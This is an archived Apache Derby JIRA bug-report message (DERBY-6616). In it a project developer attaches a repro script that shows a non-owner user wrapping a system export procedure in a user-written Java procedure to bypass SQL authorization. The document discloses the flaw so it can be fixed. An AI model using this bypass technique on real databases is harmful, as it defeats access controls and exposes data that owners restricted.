db-derby-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Rick Hillegas (JIRA)" <j...@apache.org>
Subject [jira] [Updated] (DERBY-6616) User procedures can call system procedures, circumventing SQL authorization.
Date Tue, 17 Jun 2014 13:37:02 GMT

     [ https://issues.apache.org/jira/browse/DERBY-6616?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel

Rick Hillegas updated DERBY-6616:

    Attachment: SystemProcWrapper.java

Attaching SystemProcWrapper.java, which contains a procedure wrapping SYSCS_UTIL.SYSCS_EXPORT_TABLE.
The following script shows how to use this procedure to circumvent SQL authorization checks
on the system procedure:

connect 'jdbc:derby:memory:db1;create=true;user=test_dbo';

call syscs_util.syscs_create_user( 'TEST_DBO', 'test_dbopassword' );
call syscs_util.syscs_create_user( 'RUTH', 'ruthpassword' );

-- shutdown in order to enable NATIVE authentication
connect 'jdbc:derby:memory:db1;shutdown=true';

connect 'jdbc:derby:memory:db1;user=test_dbo;password=test_dbopassword' as dbo;

create table t( a int );
insert into t values ( 1 );

grant select on t to public;

connect 'jdbc:derby:memory:db1;user=ruth;password=ruthpassword' as ruth;

-- ruth can't execute this procedure directly
call syscs_util.syscs_export_table( 'TEST_DBO', 'T', 'z.dat', null, null, null );

create procedure wrapSYSCS_EXPORT_TABLE
    in schemaname  varchar(128),
    in tablename varchar(128),
    in filename varchar(32672),
    in columndelimiter char(1),
    in characterdelimiter char(1),
    in codeset varchar(128)
language java parameter style java reads sql data
external name 'SystemProcWrapper.wrapSYSCS_EXPORT_TABLE';

-- but she can execute this wrapper procedure
call wrapSYSCS_EXPORT_TABLE( 'TEST_DBO', 'T', 'z.dat', null, null, null );

> User procedures can call system procedures, circumventing SQL authorization.
> ----------------------------------------------------------------------------
>                 Key: DERBY-6616
>                 URL: https://issues.apache.org/jira/browse/DERBY-6616
>             Project: Derby
>          Issue Type: Bug
>          Components: SQL
>    Affects Versions:
>            Reporter: Rick Hillegas
>         Attachments: SystemProcWrapper.java
> System procedures are implemented as public static methods in org.apache.derby.catalog.SystemProcedures.
These methods can be called by code in user-written procedures. This allows a user-written
procedure to circumvent the SQL authorization checks which are supposed to limit some procedures
to being called only by the DBO. I will attach a repro.

This message was sent by Atlassian JIRA

View raw message